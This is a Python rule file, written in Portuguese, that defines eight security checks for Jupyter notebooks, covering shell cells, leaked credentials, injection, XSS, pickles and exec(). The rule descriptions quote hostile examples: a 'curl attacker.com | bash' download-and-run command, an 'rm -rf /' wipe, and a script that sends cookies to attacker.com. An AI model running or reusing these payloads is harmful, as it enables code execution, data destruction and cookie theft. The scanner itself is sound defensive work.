"""Regras de segurança para Jupyter Notebooks — 8 regras (NB-001..008)."""
import re
from analyzer.models import Severity, Confidence, Language, VulnCategory
from analyzer.rules.base import Rule

NOTEBOOK_RULES: list[Rule] = [
    Rule(
        id="NB-001",
        name="Shell Command em Célula de Notebook — Execução Direta",
        description="'!comando' em células de Jupyter Notebook executa comandos diretamente no shell do servidor. Notebooks compartilhados ou commitados ao repositório com comandos shell como '!pip install malicious-package', '!curl http://attacker.com | bash' ou '!rm -rf /' são vetores de execução de código malicioso quando abertos e executados.",
        severity=Severity.HIGH,
        category=VulnCategory.COMMAND_INJECTION,
        language=Language.PYTHON,
        pattern=r'^\s*!(?:pip install|curl|wget|bash|sh|rm|chmod|chown|sudo|apt|yum)',
        remediation="Substitua '!pip install' por subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'package==version']). Use requirements.txt versionado em vez de instalação dinâmica. Nunca commite notebooks com células shell que baixam ou executam código externo. Configure JupyterHub sem permissões de shell.",
        cwe="CWE-78",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="NB-002",
        name="Credencial em Output de Célula",
        description="Tokens de API, passwords ou connection strings em outputs de células de notebook são armazenados no arquivo .ipynb (JSON). Mesmo que o desenvolvedor limpe visualmente a célula, se o notebook foi salvo com o output, o valor fica no arquivo. Notebooks commitados ao git expõem permanentemente as credenciais.",
        severity=Severity.CRITICAL,
        category=VulnCategory.HARDCODED_SECRETS,
        language=Language.PYTHON,
        pattern=r'(?:print|display)\s*\([^)]*(?:token|password|secret|api_key|connection_string|bearer)[^)]*\)',
        remediation="Nunca imprima credenciais em notebooks. Use python-dotenv para carregar de .env (não commitado): from dotenv import load_dotenv; load_dotenv(); api_key = os.getenv('API_KEY'). Configure .gitignore para *.ipynb ou use nbstripout para remover outputs antes de commit: git config filter.nbstripout.clean nbstripout.",
        cwe="CWE-312",
        owasp="A02:2021",
        confidence=Confidence.MEDIUM,
        flags=re.IGNORECASE,
    ),
    Rule(
        id="NB-003",
        name="subprocess em Notebook com Variável de Input",
        description="subprocess.run() ou os.system() em células de notebook com strings construídas de variáveis externas (leitura de arquivo, input(), parâmetros) é command injection. Notebooks usados em pipelines automatizados ou expostos via Jupyter Hub são especialmente vulneráveis.",
        severity=Severity.CRITICAL,
        category=VulnCategory.COMMAND_INJECTION,
        language=Language.PYTHON,
        pattern=r'subprocess\.(?:run|call|Popen)\s*\(\s*(?:f["\']|["\'][^"\']*\{|\w+\s*\+)',
        remediation="Use subprocess.run() com lista de strings: subprocess.run(['git', 'clone', repo_url], check=True). Valide cada argumento. Para notebooks de pipeline, use parâmetros papermill que são tipados: pm.execute_notebook('template.ipynb', 'output.ipynb', parameters={'epochs': 10}). Nunca use shell=True.",
        cwe="CWE-78",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="NB-004",
        name="display(HTML()) com Conteúdo Não Sanitizado — XSS",
        description="IPython.display.HTML() com conteúdo construído de dados externos (dataframes, resultados de API, input de usuário) renderiza HTML diretamente no browser do Jupyter. Sem sanitização, dados maliciosos como <script>fetch('http://attacker.com?c='+document.cookie)</script> executam no contexto do Jupyter.",
        severity=Severity.HIGH,
        category=VulnCategory.XSS,
        language=Language.PYTHON,
        pattern=r'(?:display\s*\(\s*HTML|HTML\s*\()\s*\(\s*(?:f["\']|["\'][^"\']*\{|\w+(?:\.to_html|\.render))',
        remediation="Sanitize HTML antes de display: from html import escape; safe_content = escape(user_data); display(HTML(f'<div>{safe_content}</div>')). Use Markdown display em vez de HTML: display(Markdown(content)). Para tabelas, use display(df) diretamente que usa rendering seguro do pandas.",
        cwe="CWE-79",
        owasp="A03:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="NB-005",
        name="API Key Hardcoded em Célula de Notebook",
        description="API keys, tokens e senhas definidos diretamente como strings em células de notebook ficam armazenados no arquivo .ipynb quando o notebook é salvo. Notebooks são frequentemente compartilhados entre membros da equipe, armazenados em repositórios e plataformas de ML como MLflow ou DVC.",
        severity=Severity.CRITICAL,
        category=VulnCategory.HARDCODED_SECRETS,
        language=Language.PYTHON,
        pattern=r"(?:API_KEY|OPENAI_API_KEY|ANTHROPIC_API_KEY|HUGGINGFACE_TOKEN|AWS_ACCESS_KEY|STRIPE_KEY|TWILIO_AUTH|SENDGRID_KEY)\s*=\s*['\"][A-Za-z0-9+/=_\-]{16,}['\"]",
        remediation="Use variáveis de ambiente: import os; api_key = os.environ['OPENAI_API_KEY']. Configure jupyter_secrets ou python-dotenv. Use Colab Secrets (Google) ou DataBricks Secrets. Instale nbstripout como git hook: nbstripout --install. Execute git-secrets ou trufflehog nos notebooks antes do push.",
        cwe="CWE-798",
        owasp="A02:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="NB-006",
        name="pd.read_sql com Query não Parametrizada",
        description="pd.read_sql(f'SELECT * FROM {user_table}', conn) ou pd.read_sql('SELECT * FROM table WHERE id=' + user_id, conn) em notebooks é SQL injection. Notebooks de data science que se conectam a bancos de produção e aceitam input de usuário (via widgets ou parâmetros) são vetores diretos.",
        severity=Severity.CRITICAL,
        category=VulnCategory.SQL_INJECTION,
        language=Language.PYTHON,
        pattern=r'pd\s*\.\s*read_sql\s*\(\s*(?:f["\']|["\'][^"\']*\+)',
        remediation="Use parametrização: pd.read_sql('SELECT * FROM orders WHERE id = %s', conn, params=(order_id,)). Com SQLAlchemy: pd.read_sql(text('SELECT * FROM t WHERE id = :id'), conn, params={'id': user_id}). Valide nomes de tabela contra uma allowlist antes de usar em queries dinâmicas.",
        cwe="CWE-89",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
    ),
    Rule(
        id="NB-007",
        name="Pickle de Modelo Commitado no Repositório",
        description="Arquivos .pkl commitados ao repositório git podem conter código malicioso que executa ao ser carregado. Repositories de notebooks no GitHub com model files são targets de supply chain attacks: um PR malicioso pode adicionar um pickle com backdoor que executa quando um colega faz git pull e roda o notebook.",
        severity=Severity.HIGH,
        category=VulnCategory.INSECURE_DESER,
        language=Language.PYTHON,
        pattern=r"with\s+open\s*\([^)]*\.pkl['\"][^)]*,\s*['\"]rb['\"]",
        remediation="Não commite arquivos .pkl ao git. Adicione *.pkl ao .gitignore. Use DVC (Data Version Control) para versionar artefatos de ML em object storage (S3, GCS) com checksums. Para compartilhar modelos, use MLflow Model Registry, Hugging Face Hub com verificação de hash, ou safetensors format.",
        cwe="CWE-502",
        owasp="A08:2021",
        confidence=Confidence.MEDIUM,
    ),
    Rule(
        id="NB-008",
        name="exec() em Célula de Notebook",
        description="exec(user_code) ou exec(cell_content) em células Jupyter executa código Python arbitrário no processo do kernel. Usado em notebooks que tentam criar 'meta-programming' ou 'dynamic cells', exec() é um vetor de execução de código arbitrário especialmente perigoso em ambientes multi-usuário como JupyterHub.",
        severity=Severity.CRITICAL,
        category=VulnCategory.CODE_INJECTION,
        language=Language.PYTHON,
        pattern=r'\bexec\s*\(\s*(?:input\s*\(|user_|cell_|code_|template\s*\%)',
        remediation="Nunca use exec() com input externo em notebooks. Para code generation dinâmico, use abordagens seguras: templates com placeholders fixos, AST manipulation com ast.parse() e whitelist de operações permitidas, ou um DSL específico do domínio. Em JupyterHub multi-usuário, exec() é especialmente perigoso.",
        cwe="CWE-94",
        owasp="A03:2021",
        confidence=Confidence.HIGH,
    ),
]
